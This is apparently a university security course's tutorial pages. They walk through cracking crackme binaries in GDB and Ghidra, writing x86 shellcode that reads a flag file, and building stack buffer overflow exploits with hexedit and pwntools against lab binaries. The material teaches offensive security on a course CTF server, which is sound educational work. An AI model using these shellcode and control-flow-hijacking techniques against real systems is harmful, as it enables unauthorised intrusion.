Please refer to the course page on Canvas for information on registration and on the course website for flag submission.
When you register on the course website, you should receive an email with an api-key. This is essentially your identity for this class. You can use it to log into the course website.
If you experience any difficulties with registration, please send us an email. 6265-staff@cc.gatech.edu
Before we proceed any further, please read the game rules.
Students registered for the course can do the tutorials on our lab servers without installing anything locally (please check Canvas or Ed Discussions for login info). For anyone else who would like to follow our tutorials, you can easily set up a local virtual environment like so:
$ mkdir cs6265-tut $ cd cs6265-tut $ wget https://tc.gts3.org/cs6265/tut/tut.tar.gz $ tar xzvf tut.tar.gz ... $ cd tut $ vagrant up ... $ vagrant ssh ... [vm] $ ./seclab tut01
Before doing each tutorial, please run ./seclab [tut] (e.g. tut01, tut02) to set up the environment.
./seclab [tut]
tut01
tut02
Did you successfully connect to the CTF server? Let's start playing with some binaries.
For this tutorial, we've prepared four "crackme" binaries. Your goal is very simple: find a password that each binary accepts. Before tackling this week's challenges, you'll learn how to use GDB, how to read x86 assembly, and how to have the mindset of a hacker!
We highly recommend tackling the crackme binaries first (at least up to 0x03) before jumping into the bomblab. In the bomblab, if you make a mistake ("exploding the bomb"), some points will be deducted from your score.
In this tutorial, we'll solve two of the crackme binaries together.
# log into the CTF server # ** check Canvas for login information! ** [host] $ ssh lab01@<ctf-server-address> # let's start lab01! [CTF server] $ cat README [CTF server] $ cd tut01-crackme
Where should we start? There are many options:
Reading the whole binary first (e.g., objdump -M intel -d crackme0x00)
objdump -M intel -d crackme0x00
Starting it in a GDB session (e.g., gdb ./crackme0x00) and setting a breakpoint on some known function (for example, main() is luckily exposed in this binary -- try nm crackme0x00 to see) before running it (r)
gdb ./crackme0x00
main()
nm crackme0x00
r
Running ./crackme0x00 first (waiting on the "Password" prompt) and then attaching it to GDB (e.g., gdb -p $(pgrep crackme0x00))
./crackme0x00
gdb -p $(pgrep crackme0x00)
Or just running with GDB (gdb ./crackme0x00), starting the binary (r), and then pressing Ctrl-C (i.e., sending a SIGINT signal) to return to GDB while on the "Password" prompt
Ctrl-C
Let's take 4. as an example.
$ gdb ./crackme0x00 Reading symbols from ./crackme0x00...(no debugging symbols found)...done. (gdb) r
[r]un is the command to run a program; try help run for more.
[r]un
help run
Starting program: /home/lab01/tut01-crackme/crackme0x00 IOLI Crackme Level 0x00 Password: ^C
Press Ctrl+C (^C) to send a signal to stop the process, which will bring you back to the GDB prompt.
Ctrl+C
^C
Program received signal SIGINT, Interrupt. 0xf7fd8d09 in __kernel_vsyscall () (gdb) bt #0 0xf7fd5079 in __kernel_vsyscall () #1 0xf7ecbdf7 in __GI___libc_read (fd=0, buf=0x804b570, nbytes=1024) at ../sysdeps/unix/sysv/linux/read.c:27 #2 0xf7e58258 in _IO_new_file_underflow (fp=<optimized out>) at fileops.c:531 #3 0xf7e5937b in __GI__IO_default_uflow (fp=0xf7fbd5c0 <_IO_2_1_stdin_>) at genops.c:380 #4 0xf7e3ccb1 in _IO_vfscanf_internal (s=<optimized out>, format=<optimized out>, argptr=<optimized out>, errp=<optimized out>) at vfscanf.c:630 #5 0xf7e47e25 in __scanf (format=0x80487f1 "%s") at scanf.c:33 #6 0x080486d1 in main (argc=1, argv=0xffffd6c4) at crackme0x00.c:14
[bt]: print backtrace (i.e., stack frames). Again, don't forget to check help bt.
[bt]
help bt
(gdb) tbreak *0x080486d1 Temporary breakpoint 1 at 0x080486d1
The backtrace shows that main() called __scanf() with return address 0x080486d1 (your addresses may be different). That seems like a good place to set a temporary breakpoint, since we'd like to investigate what main() does with the value it gets from that call. We use [tbreak] to set a temporary breakpoint (help b, help tb, help rb) there.
__scanf()
0x080486d1
[tbreak]
help b
help tb
help rb
(gdb) c Continuing. aaaaaaaaaaaaaa
[c]ontinue to run the process. Type aaaaaaaaaaaaaa or some other random input, so the call to scanf() will end.
[c]ontinue
aaaaaaaaaaaaaa
scanf()
Temporary breakpoint 1, 0x080486d1 in main ()
OK, it hit the breakpoint. Let's check the context.
[disas]semble: dump the assembly code in the current scope.
[disas]semble
(gdb) set disassembly-flavor intel (gdb) disas 0x080486a3 <+0>: push ebp 0x080486a4 <+1>: mov ebp,esp 0x080486a6 <+3>: sub esp,0x10 0x080486a9 <+6>: push 0x80487f4 0x080486ae <+11>: call 0x8048470 <puts@plt> 0x080486b3 <+16>: add esp,0x4 0x080486b6 <+19>: push 0x804880c 0x080486bb <+24>: call 0x8048430 <printf@plt> 0x080486c0 <+29>: add esp,0x4 0x080486c3 <+32>: lea eax,[ebp-0x10] 0x080486c6 <+35>: push eax 0x080486c7 <+36>: push 0x80487f1 0x080486cc <+41>: call 0x8048480 <scanf@plt> => 0x080486d1 <+46>: add esp,0x8 0x080486d4 <+49>: push 0x8048817 0x080486d9 <+54>: lea eax,[ebp-0x10] 0x080486dc <+57>: push eax 0x080486dd <+58>: call 0x8048420 <strcmp@plt> 0x080486e2 <+63>: add esp,0x8 0x080486e5 <+66>: test eax,eax 0x080486e7 <+68>: jne 0x8048705 <main+98> 0x080486e9 <+70>: push 0x804881e 0x080486ee <+75>: call 0x8048470 <puts@plt> 0x080486f3 <+80>: add esp,0x4 0x080486f6 <+83>: push 0x804882d 0x080486fb <+88>: call 0x80485f6 <print_key> 0x08048700 <+93>: add esp,0x4 0x08048703 <+96>: jmp 0x8048712 <main+111> 0x08048705 <+98>: push 0x804883c 0x0804870a <+103>: call 0x8048470 <puts@plt> 0x0804870f <+108>: add esp,0x4 0x08048712 <+111>: mov eax,0x0 0x08048717 <+116>: leave 0x08048718 <+117>: ret End of assembler dump.
This is the full assembly code for main(). The "=>" shows the instruction the binary is currently paused on.
=>
Please try to read and understand the code.
0x080486c3 <+32>: lea eax,[ebp-0x10] 0x080486c6 <+35>: push eax 0x080486c7 <+36>: push 0x80487f1 0x080486cc <+41>: call 0x8048480 <scanf@plt>
This is the call to scanf(). The second value pushed is the address of the format string; let's check what it is:
(gdb) x/s 0x80487f1 0x80487f1: "%s"
So, in C, that call would look like this ("buf" being some buffer on the stack):
buf
scanf("%s", buf);
Your input can be found in the buffer:
(gdb) x/s $ebp-0x10 0xffffcb30: 'a' <repeats 24 times>
Please learn about the e[x]amine command (help x), which is one of the most versatile commands in GDB.
e[x]amine
help x
0x080486d4 <+49>: push 0x8048817 0x080486d9 <+54>: lea eax,[ebp-0x10] 0x080486dc <+57>: push eax 0x080486dd <+58>: call 0x8048420 <strcmp@plt>
In the same way as before (try examining the argument string), you can find that this is equivalent to:
strcmp(buf, "250381");
0x080486e5 <+66>: test eax,eax 0x080486e7 <+68>: jne 0x8048705 <main+98> 0x080486e9 <+70>: push 0x804881e 0x080486ee <+75>: call 0x8048470 <puts@plt> 0x080486f3 <+80>: add esp,0x4 0x080486f6 <+83>: push 0x804882d 0x080486fb <+88>: call 0x80485f6 <print_key> 0x08048700 <+93>: add esp,0x4 0x08048703 <+96>: jmp 0x8048712 <main+111> 0x08048705 <+98>: push 0x804883c 0x0804870a <+103>: call 0x8048470 <puts@plt>
That corresponds to the following (prove to yourself that it does):
if (!strcmp(buf, "250381")) { printf("Password OK :)\n") ... } else { printf("Invalid Password!\n"); }
[Task] Try the password we found! Does it work? You can submit the flag to the submission site to get 20 points for the tutorial!
Let's go more quickly with this binary. Please take similar steps as for crackme0x00, and reach this place.
(gdb) disas 0x08048486 <+0>: push ebp 0x08048487 <+1>: mov ebp,esp 0x08048489 <+3>: sub esp,0x4 0x0804848c <+6>: push 0x8048570 0x08048491 <+11>: call 0x8048330 <puts@plt> 0x08048496 <+16>: add esp,0x4 0x08048499 <+19>: push 0x8048588 0x0804849e <+24>: call 0x8048320 <printf@plt> 0x080484a3 <+29>: add esp,0x4 0x080484a6 <+32>: lea eax,[ebp-0x4] 0x080484a9 <+35>: push eax 0x080484aa <+36>: push 0x8048593 0x080484af <+41>: call 0x8048340 <scanf@plt>
What's scanf() doing (i.e., what's the value of 0x8048593)?
0x8048593
=> 0x080484b4 <+46>: add esp,0x8 0x080484b7 <+49>: mov eax,DWORD PTR [ebp-0x4] 0x080484ba <+52>: cmp eax,0xc8e
This is comparing our input with 0xc8e (hex? integer?), which means that's probably the password.
0xc8e
0x080484b4 <+46>: add esp,0x8 0x080484b7 <+49>: mov eax,DWORD PTR [ebp-0x4] 0x080484ba <+52>: cmp eax,0xc8e 0x080484bf <+57>: jne 0x80484d0 <main+74> 0x080484c1 <+59>: push 0x8048596 0x080484c6 <+64>: call 0x8048330 <puts@plt> 0x080484cb <+69>: add esp,0x4 0x080484ce <+72>: jmp 0x80484dd <main+87> 0x080484d0 <+74>: push 0x80485a5 0x080484d5 <+79>: call 0x8048330 <puts@plt> 0x080484da <+84>: add esp,0x4 0x080484dd <+87>: mov eax,0x0 0x080484e2 <+92>: leave 0x080484e3 <+93>: ret
[Task] Try the password we found! Does it work? Great. Please explore all four crackme binaries, and when you think you're ready, please start the bomblab!
The bomblab challenges are all in a single "bomb" binary, which you can find under the home directory of user lab01 on the CTF server.
bomb
lab01
[host] ssh lab01@<ctf-server-address> [CTF server] $ pwd /home/lab01 [CTF server] $ ls -alh | grep bomb -rwsr-x--- 1 bomb110-raspberry lab01 22K Jan 14 2021 bomb
Execute the bomb binary and provide your API key to get started:
[CTF server] $ ./bomb Enter your api-key: <your-api-key> ,--.!, ____ _ _ _ __/ -*- | __ ) ___ _ __ ___ | |__ | | __ _| |__ ,d08b. '|` | _ \ / _ \| '_ ` _ \| '_ \| |/ _` | '_ \ 0088MM | |_) | (_) | | | | | | |_) | | (_| | |_) | `9MMP' |____/ \___/|_| |_| |_|_.__/|_|\__,_|_.__/ cs6265 Welcome to my fiendish little bomb. You have N? phases with which to blow yourself up. See you alive! (hint: seriously, security question?) >
[Task] Defuse the bomb by providing the right answer to each phase. Be careful when handling the bomb; if you enter a wrong answer, the bomb will explode, and you'll lose points for that phase. Submit the flags from each phase to the submission site to earn points.
In this tutorial, we will learn how to write "shellcode" (a payload to get a flag) in assembly. Before we start, let's arm ourselves with two new tools, one for better dynamic analysis (pwndbg) and another for better static analysis (Ghidra).
For local installation, please refer to https://github.com/pwndbg/pwndbg. We've already prepared pwndbg for you on our CTF server:
# log into the CTF server # ** check Canvas for login information! ** [host] $ ssh lab02@<ctf-server-address> # launch pwndbg with 'gdb-pwndbg' [CTF server] $ gdb-pwndbg [CTF server] pwndbg: loaded 175 commands. Type pwndbg [filter] for a list. [CTF server] pwndbg: created $rebase, $ida gdb functions (can be used with print/break) [CTF server] pwndbg>
Let's test pwndbg with a tutorial binary, tut02-shellcode/target.
tut02-shellcode/target
To learn about new features pwndbg adds to GDB, please check here.
We'll introduce a few more of pwndbg's features in later labs, but here's a list of useful commands you can try if you're feeling adventurous:
aslr
checksec
elfheader
hexdump
$sp
main
nearpc
nextcall
nextjmp
nextjump
nextret
nextsc
nextsyscall
pdisass
procinfo
regs
stack
search
telescope
vmmap
We also found its cheatsheet very useful.
Ghidra is an interactive disassembler (and decompiler) widely used by reverse engineers for statically analyzing binaries. We'll introduce the basic concepts of Ghidra in this tutorial.
Please first install Ghidra on your host machine by following this guide.
Next, fetch crackme0x00 from the CTF server, and launch Ghidra.
crackme0x00
# copy crackme0x00 from the server to a local dir [host] $ scp lab01@<ctf-server-address>:tut01-crackme/crackme0x00 crackme0x00 # run Ghidra (make sure you've installed it first!) # (on linux /macOS) [host] $ ./<ghidra_dir>/ghidraRun # (on windows) [host] $ ./<ghidra_dir>/ghidraRun.bat
You should now be greeted by the user agreement and project window:
Create a new project by choosing "File" -> "New Project". Select "Non-Shared Project", choose a "Project Name" (we'll use "tut01"), and drag your local crackme0x00 into the folder just created. Double-click on the binary to start analyzing it.
Once the analysis is done, you will be shown Ghidra's multiple subviews of the program. Before we jump into the details, we need to briefly understand what each one is for. Program Trees and Symbol Tree show the loaded segments and symbols of the analyzed binary. Listing: crackme0x00 in the middle shows a view of the binary's assembly code. On the right-hand side, we have the decompiled source code of the main() function.
Program Trees
Symbol Tree
Listing: crackme0x00
To examine the binary, click on main under Symbol Tree. This will take you to that symbol's address in the text (i.e., code) segment. You'll also have a synced view of Ghidra's decompiled C code for main, side-by-side.
The decompiled C code is much easier to understand than the assembly code. With it, you can find that the binary gets a password from the user (lines 11-12) and compares it with 250381 (line 13).
250381
From now on, feel free to utilize Ghidra when analyzing challenge binaries from the labs. In addition, its binary patching functionality might come in handy for tackling this week's bomblab!
Let's discuss today's main topic, writing shellcode! "Shellcode" is a generic term referring to a payload for exploitation, often with the goal of launching an interactive shell.
All of the files in lab02's home directory are read-only. In order to modify them, you'll need to make copies in a writable location. You can make a folder in the the lab server's /tmp (something like /tmp/<x0x0-your-secret-dir>), or copy to your local machine.
lab02
/tmp
/tmp/<x0x0-your-secret-dir>
Choose a unique /tmp folder name that can't be easily guessed, so nobody else finds your code on the lab server! Here's a command to securely generate a random string, which you can use if you'd like: python3 -c "import secrets; print(secrets.token_urlsafe())"
python3 -c "import secrets; print(secrets.token_urlsafe())"
# copying to /tmp: [CTF server] $ cp -rf tut02-shellcode /tmp/<x0x0-your-secret-dir> [CTF server] $ cd /tmp/<x0x0-your-secret-dir> # copying to local machine: [host] $ scp -r lab02@<ctf-server-address>:tut02-shellcode/ . [host] $ cd tut02-shellcode
Note that there's a pre-built 'target' binary in the tutorial folder:
$ ls -al tut02-shellcode total 44 drwxr-x--- 2 nobody lab02 4096 Aug 26 19:48 . drwxr-x--- 13 nobody lab02 4096 Aug 23 13:32 .. -rw-r--r-- 1 nobody nogroup 535 Aug 23 13:32 Makefile -rw-r--r-- 1 nobody nogroup 11155 Aug 26 19:48 README -rw-r--r-- 1 nobody nogroup 1090 Aug 23 13:32 shellcode.S -r-sr-x--- 1 tut02-shellcode lab02 9820 Aug 23 13:32 target -rw-r--r-- 1 nobody nogroup 482 Aug 23 13:32 target.c
Does it look different from the other files in terms of permissions (especially the "s" in the permissions bits)? This is a "setuid" file, a special type of file that, when invoked, obtains the privileges of the owner of the file rather than of the user that invoked it -- in this case, the owner being "tut02-shellcode". In every lab, you can play with modified copies of the challenge binaries all you want, but this permissions configuration means you can only ever get valid flags from the original (read-only) binaries.
tut02-shellcode
Your task is to get the flag from the target binary by modifying the provided shellcode to invoke /bin/cat. Before going further, please take a look at these two important files.
/bin/cat
$ cat Makefile $ cat shellcode.S
We will modify the shellcode to invoke /bin/cat, and use it to read the flag as follows:
$ cat /proc/flag
[Task] Please modify the below lines in shellcode.S:
shellcode.S
#define STRING "/bin/sh" #define STRLEN 7
Try:
$ make test bash -c '(cat shellcode.bin; echo; cat) | ./target' > length: 46 > 0000: EB 1F 5E 89 76 09 31 C0 88 46 08 89 46 0D B0 0B > 0010: 89 F3 8D 4E 09 8D 56 0D CD 80 31 DB 89 D8 40 CD > 0020: 80 E8 DC FF FF FF 2F 62 69 6E 2F 63 61 74 hello hello
Type hello. Do you see hello echo-ed?
hello
Let's also try using strace to trace system calls.
strace
$ (cat shellcode.bin; echo; cat) | strace ./target ... mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff77b5000 write(1, "> length: 46\n", 13> length: 46 ) = 13 write(1, "> 0000: EB 1F 5E 89 76 09 31 C0 "..., 57> 0000: EB 1F 5E 89 76 09 31 C0 88 46 08 89 46 0D B0 0B ) = 57 write(1, "> 0010: 89 F3 8D 4E 09 8D 56 0D "..., 57> 0010: 89 F3 8D 4E 09 8D 56 0D CD 80 31 DB 89 D8 40 CD ) = 57 write(1, "> 0020: 80 E8 DC FF FF FF 2F 62 "..., 51> 0020: 80 E8 DC FF FF FF 2F 62 69 6E 2F 63 61 74 ) = 51 execve("/bin/cat", ["/bin/cat"], [/* 0 vars */]) = 0 [ Process PID=4565 runs in 64 bit mode. ] ...
Do you see execve("/bin/cat"...)? You can also specify "-e" to limit the output to just the system calls you're interested in (in this case, execve):
execve("/bin/cat"...)
execve
$ (cat shellcode.bin; echo; cat) | strace -e execve ./target execve("./target", ["./target"], [/* 20 vars */]) = 0 [ Process PID=4581 runs in 32 bit mode. ] > length: 46 > 0000: EB 1F 5E 89 76 09 31 C0 88 46 08 89 46 0D B0 0B > 0010: 89 F3 8D 4E 09 8D 56 0D CD 80 31 DB 89 D8 40 CD > 0020: 80 E8 DC FF FF FF 2F 62 69 6E 2F 63 61 74 execve("/bin/cat", ["/bin/cat"], [/* 0 vars */]) = 0 [ Process PID=4581 runs in 64 bit mode. ]
If you're not familiar with execve(), please read man execve. You can also read man strace for more on strace.
execve()
man execve
man strace
/proc/flag
Let's modify the shellcode to provide an argument to /bin/cat (i.e., /proc/flag). Your current payload looks like this:
+------------+ v | [/bin/cat][0][ptr ][NULL] ^ ^ | +-- envp +-- argv
Note: The shellcode can't include any null (0) bytes, because the binary treats the shellcode input as a string, and a null byte would terminate it. Instead, the null byte is written at runtime by:
mov [STRLEN + esi],al /* null-terminate our string */
Our plan is to make the payload as follows:
+---------------------------+ | +--------------=-----+ v v | | [/bin/cat][0][/proc/flag][0][ptr1][ptr2][NULL] ^ ^ | +-- envp +-- argv
Modify /bin/cat to /bin/catN/proc/flag:
/bin/catN/proc/flag
#define STRING "/bin/catN/proc/flag" #define STRLEN1 8 #define STRLEN2 19
"N" is a placeholder character for a null byte we will overwrite.
How can you update STRLEN like this? Fix the compilation errors!
STRLEN
Place a null byte after /bin/cat and /proc/flag:
This part of the assembly code adds a null terminator after the string:
Can you add some additional code to place another null terminator in the middle of the string, overwriting the "N"?
Then try:
$ make test ... execve("/bin/cat", ["/bin/cat"], [/* 0 vars */])
Does it execute /bin/cat?
Modify argv[1] to point to /proc/flag!
argv[1]
This part of the assembly code puts a pointer to "/bin/cat" in ARGV+0:
mov [ARGV+esi],esi /* set up argv[0] pointer to pathname */
Can you add some additional code to place the address of "/proc/flag" in ARGV+4?
$ make test ... execve("/bin/cat", ["/bin/cat", "/proc/flag"], [/* 0 vars */]) = 0
Does it execute /bin/cat with /proc/flag?
Tips: When using gdb-pwndbg to debug shellcode...
gdb-pwndbg
$ gdb-pwndbg ./target
You can break right before executing your shellcode:
pwndbg> br target.c:24
You can run and inject shellcode.bin to its stdin:
shellcode.bin
stdin
pwndbg> run < shellcode.bin ...
You can also check if your shellcode is placed correctly:
pwndbg> pdisas &buf ...
[Task] Once you're done, run the command below and get the true flag to submit!
$ cat shellcode.bin | /home/lab02/tut02-shellcode/target
Great, you're now ready to write x86 shellcode! This week, we'll be writing various kinds of shellcode (e.g., targeting x86, x86-64, or both!), and also with various properties (e.g., ascii-only or with size constraints!). Have fun!
In this tutorial, you'll learn, for the first time, how to write a control-flow hijacking attack that exploits a buffer overflow vulnerability!
There are a few ways to check the reason for a segmentation fault:
Note: "/tmp/[secret]/input" below is a placeholder name for your secret input file in /tmp.
/tmp/[secret]/input
Running GDB:
$ cd ~/tut03-stackovfl/ $ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > /tmp/[secret]/input $ gdb ./crackme0x00 > run </tmp/[secret]/input Starting program: ./crackme0x00 </tmp/[secret]/input IOLI Crackme Level 0x00 Password: Invalid Password! Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()
Checking logging messages (if you're working on your local machine):
$ dmesg | tail -1 [19513751.485863] crackme0x00[20200]: segfault at 41414141 ip 000000000804873c sp 00000000ffffd668 error 4 in crackme0x00[8048000+1000]
Note: dmesg is disabled on our lab server, but you can use it in your own local environment.
Checking logging messages (if you're working on our server):
When you're working under /tmp/ (and only then), our server stores dmesg-like logging information for you whenever a lab challenge crashes. For example, you can find a logging output file named "core_info" under your /tmp/[secret]/ directory if you crash our tutorial binary, crackme0x00:
/tmp/
core_info
/tmp/[secret]/
$ mkdir /tmp/[secret]/ $ cd /tmp/[secret]/ $ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > input $ cat input | ~/tut03-stackovfl/./crackme0x00 ... $ ls core_info input $ cat core_info [New LWP 18] Core was generated by `/home/lab03/tut03-stackovfl/crackme0x00'. Program terminated with signal SIGSEGV, Segmentation fault. #0 0x41414141 in ?? () eax 0x0 0 ecx 0x804b160 134525280 edx 0xf7fbe890 -134485872 ebx 0x0 0 esp 0xffffd5e8 0xffffd5e8 ebp 0x41414141 0x41414141 esi 0xf7fbd000 -134492160 edi 0x0 0 eip 0x41414141 0x41414141 eflags 0x10292 [ AF SF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x63 99
The instruction pointer was overwritten with 0x41414141 ("AAAA", part of our input string). Let's figure out exactly which part of our input tainted the instruction pointer.
$ cd /tmp/[secret]/ $ echo AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ > input $ cat input | ~/tut03-stackovfl/./crackme0x00 $ dmesg | tail -1 [19514227.904759] crackme0x00[21172]: segfault at 46464646 ip 0000000046464646 sp 00000000ffffd688 error 14 in libc-2.27.so[f7de5000+1d5000]
What's the instruction pointer's value now, as a string? (man ascii might help.) Can you now tell what part of the string is overwriting it?
man ascii
You can infer the shape of a function's stack frame from the function's disassembly (for example, with Ghidra or objdump):
$ objdump -M intel-mnemonic -d crackme0x00 ... 080486b3 <start>: 80486b3: 55 push ebp 80486b4: 89 e5 mov ebp,esp 80486b6: 83 ec 10 sub esp,0x10 ...
Let's analyze how the stack frame is constructed:
When start is called (by whatever other function calls it), the return address is automatically pushed onto the stack by the call instruction. So every stack frame always has the return address ("ra") at the top:
start
call
esp V <...> [ra]
ebp is a register that's used to point to the top of the current function's stack frame. When the function begins, "push ebp" pushes that register's previous value (from the calling function) to the stack, so that it can be properly restored later when the function returns. Then mov ebp,esp updates ebp to be correct for the current function.
ebp
push ebp
mov ebp,esp
ebp/esp V <...> [bp] [ra]
sub esp,0x10 reserves 0x10 bytes for local variables.
sub esp,0x10
esp ebp V V [??????????] [bp] [ra] |<- 0x10 ->|
Looking down a bit farther, at the call to scanf:
scanf
... 80486d3: 8d 45 f0 lea eax,[ebp-0x10] 80486d6: 50 push eax 80486d7: 68 11 88 04 08 push 0x8048811 80486dc: e8 9f fd ff ff call 8048480 <scanf@plt> ...
The first argument is 0x8048811 (you can check what's at that address -- it's "%s"), and the second is ebp-0x10. scanf will write its string output to its second argument, so we can consider that area on the stack to be the buffer.
"%s"
ebp-0x10
There could be other local variables within that 0x10 bytes, but in this case there aren't any. The only way to find out exactly how the local variables are arranged is to study the entire function (perhaps with the help of a decompiler) and see how it uses its stack frame.
So for our long, overflowing input string, the first 0x10 bytes will fit in the 0x10-byte buffer, the next 4 will overwrite the stored ebp, and the next 4 will overwrite the return address, which is what the instruction pointer will be set to when the function returns. That's why it ended up as FFFF -- those are the 0x14'th through 0x18'th bytes of our input.
FFFF
What do you expect ebp to end up as? Check core_info and see if you're right!
In this tutorial, we're going to hijack the control flow of crackme0x00 by overwriting the instruction pointer. As a first step, let's make it print out Password OK :) without giving it the correct password!
Password OK :)
80486ed: e8 2e fd ff ff call 8048420 <strcmp@plt> 80486f2: 83 c4 08 add esp,0x8 80486f5: 85 c0 test eax,eax 80486f7: 75 31 jne 804872a <start+0x77> ->80486f9: 68 3e 88 04 08 push 0x804883e 80486fe: e8 6d fd ff ff call 8048470 <puts@plt> ... 804872c: 68 92 88 04 08 push 0x8048892 8048731: e8 3a fd ff ff call 8048470 <puts@plt> 8048736: 83 c4 10 add esp,0x10
We're going to jump to 0x80486f9 so that it'll print out Password OK :).
0x80486f9
Which characters in the input should be changed to 0x80486f9? Keep in mind that x86 is a little-endian architecture.
$ hexedit /tmp/[secret]/input
"Ctrl+X" will exit and let you save your changes.
$ cat input | ~/tut03-stackovfl/./crackme0x00 IOLI Crackme Level 0x00 Password: Invalid Password! Password OK :) Segmentation fault
Today's main task is to modify a Python template for exploitation. Please edit the provided Python script (exploit.py) to hijack the control flow of crackme0x00! Most importantly, to get the flag, you need to hijack the control flow to reach unreachable code in the binary.
exploit.py
// To get the flag, your input seemingly needs to be both "250381" // and "no way you can reach!" at the same time! 8048706: 68 4d 88 04 08 push 0x804884d 804870b: 8d 45 f0 lea eax,[ebp-0x10] 804870e: 50 push eax 804870f: e8 0c fd ff ff call 8048420 <strcmp@plt> 8048714: 83 c4 08 add esp,0x8 8048717: 85 c0 test eax,eax 8048719: 75 1c jne 8048737 <start+0x84> ->804871b: 68 63 88 04 08 push 0x8048863 8048720: e8 d1 fe ff ff call 80485f6 <print_key>
In this template, we will start utilizing pwntools, which provides a set of libraries and tools to help writing exploits. Although we'll cover the details of pwntools in the next tutorial, you can have a glimpse here of how it looks.
#!/usr/bin/env python3 # import variables/functions from pwntools into our global namespace, # for easy access from pwn import * if __name__ == '__main__': # p32/64 for "packing" 32- or 64-bit integers # so, given an integer, it returns a packed (i.e., encoded) bytestring assert p32(0x12345678) == b'\x00\x00\x00\x00' # Q1 assert p64(0x12345678) == b'\x00\x00\x00\x00\x00\x00\x00\x00' # Q2 payload = b'Q3. your input here' # launch a process (with no arguments) p = process(['./crackme0x00']) # send an input payload to the process p.send(payload + b'\n') # or, shorter: "p.sendline(payload)" # make it interactive, meaning that we can interact with the # process's input/output (via a pseudo-terminal) p.interactive()
Modify Q1-3 in the template to make this exploit work.
[Task] Modify the template (exploit.py) to hijack the control flow and print out the flag.
If you'd like to practice more, can you make the exploit gracefully exit the program after hijacking its control multiple times?
Let's discuss how we can utilize the set exec-wrapper feature in GDB to better match the process's behavior outside the debugger. When exec-wrapper is set, the specified wrapper is used to launch programs for debugging. GDB starts your program with a shell command of the form exec-wrapper program. Any program that eventually calls execve on its arguments can be used as a wrapper.
set exec-wrapper
exec-wrapper
exec-wrapper program
For example, you can use env (learn about it: man env) to pass an environment variable to the debugged program, without setting the variable in your shell’s environment:
env
man env
(gdb) set exec-wrapper env 'LD_PRELOAD=libtest.so' (gdb) run
For further reading about exec-wrapper, please refer to here.
In order to get a predictable stack in a system with ASLR disabled, set exec-wrapper env -i can be used to ensure that the program is launched in an empty environment while debugging. For example, you can use it when getting a core dump:
set exec-wrapper env -i
$ mkdir /tmp/[secret]/ $ cd /tmp/[secret]/ $ gdb-pwndbg ~/tut03-stackovfl/crackme0x00 pwndbg> set exec-wrapper env -i pwndbg> r Starting program: /home/lab03/tut03-stackovfl/crackme0x00 IOLI Crackme Level 0x00 Password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Invalid Password! Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () pwndbg> gcore Saved corefile core.545
Note that "set exec-wrapper env -i" is a default GDB setting on the lab server. If you don't want to use it, please disable it before debugging, e.g.,
$ export SHELLCODE="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $ gdb-pwndbg ~/jmp-to-env/target pwndbg> unset exec-wrapper pwndbg> r BBBB
On Linux, environment variables are stored at the top of the stack when a program is launched. Thus, the main reasons why stack addresses in GDB can be different from running the program by itself are that
LINES
COLUMNS
_
Hence, to make stack addresses consistent, we need to:
Use absolute paths when executing inside and outside of GDB, e.g.,
$ env -u _ /home/lab03/jmp-to-env/target [input]
Remove extra env variables, e.g.
pwndbg> set exec-wrapper env -u LINES -u COLUMNS -u _
By setting the exec-wrapper above, we can remove the three extra env variables while debugging so that the environment inside GDB matches the environment outside of it.
Or, alternatively, use env -i as your exec-wrapper to remove all environment variables, and run the binary outside of GDB with env -i as well.
env -i
In the last tutorial, we used a Python template for writing an exploit, which demonstrated some basic functionality of pwntools. In this tutorial, we'll take a deeper dive and learn more about pwntools and how it can help us write exploits more easily.
Do you remember step 1 of Tut03?
# log into the CTF server # ** check Canvas for login information! ** [host] $ ssh lab03@<ctf-server-address> $ cd tut03-pwntool $ ./crackme0x00 IOLI Crackme Level 0x00 Password:
In the last tutorial, we could hijack this binary's control flow by injecting a long enough input, like this:
$ echo AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ > /tmp/[secret]/input $ ./crackme0x00 < /tmp/[secret]/input IOLI Crackme Level 0x00 Password: Invalid Password! Segmentation fault $ gdb-pwndbg ./crackme0x00 pwndbg> r < /tmp/[secret]/input ... Program received signal SIGSEGV (fault address 0x47474747)
pwntools actually provides a convenient way to create inputs like this, commonly known as "cyclic" inputs.
$ cyclic 50 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
While our simple pattern would've hit a logical roadblock when we reached "ZZZZ", this one can go for much longer.
Given any four bytes in the sequence, pwntools lets us easily look up their position in the input string.
$ cyclic 50 | ./crackme0x00 $ cyclic 50 > /tmp/[secret]/input $ gdb-pwndbg ./crackme0x00 pwndbg> r </tmp/[secret]/input ... Program received signal SIGSEGV (fault address 0x61616167) $ cyclic -l 0x61616167 24 $ cyclic --help ...
We can also use cyclic from within a Python script (below, exploit1.py):
cyclic
exploit1.py
#!/usr/bin/env python3 # import all modules/functions from pwn library from pwn import * # set the context of the target platform: # arch: i386 (x86 32-bit) # os: linux context.update(arch='i386', os='linux') # create a process p = process('./crackme0x00') # send input to the program, followed by a newline char, "\n" # (cyclic(50) provides a cyclic string with 50 chars) p.sendline(cyclic(50)) # make the process interactive, so you can interact # with it via its terminal p.interactive()
[Task] Hijack the program's control flow to 0xdeadbeef using cyclic_find() and p32().
cyclic_find()
p32()
Let's hijack the control flow to invoke an interactive shell.
Before we start, let's check what kinds of security protections have been applied to the binary (again using utilities from pwntools):
$ checksec ./crackme0x00 [*] '/home/lab03/tut03-pwntool/crackme0x00' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments
Do you see "NX disabled"? That means its memory spaces such as the stack are executable, meaning we can run shellcode there!
Our plan is to hijack its return address ("ra") and jump to some shellcode.
